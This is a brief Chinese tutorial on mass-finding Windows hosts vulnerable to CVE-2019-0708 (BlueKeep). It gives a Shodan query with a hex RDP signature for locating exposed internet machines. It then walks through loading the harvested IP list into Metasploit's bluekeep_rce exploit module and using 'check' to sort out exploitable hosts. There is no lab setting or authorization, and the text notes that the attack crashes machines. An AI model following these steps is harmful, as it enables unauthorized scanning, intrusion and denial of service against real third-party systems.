目录
批量查找CVE-2019-0708漏洞
简述:
漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,导致机器蓝屏瘫痪。
输入命令:
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
用16进制是因为shodan search vuln:cve -2019-0708 命令对于学术账号无权限使用,需要注册更高一级账户
查到ip和对应端口后,通过 shodan host ip 来验证是否存在该漏洞,如下所示,这个ip则存在CVE-2019-0708漏洞
扫描下来的ip可以放到文档里(注意把端口删掉),利用windows自带远程桌面连接尝试连接
回到kali,输入msfconsole,再输入search 0708 查找此漏洞
输入以下命令启用这个模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
输入show options显示选项
然后输入 set rhosts file: 上述存放ip的文档路径
这里可以直接把文件托进命令面板
再输入check检查,带* 号的不能利用,带+号的可以利用
输入show targets可以查看利用的版本
输入exit退出
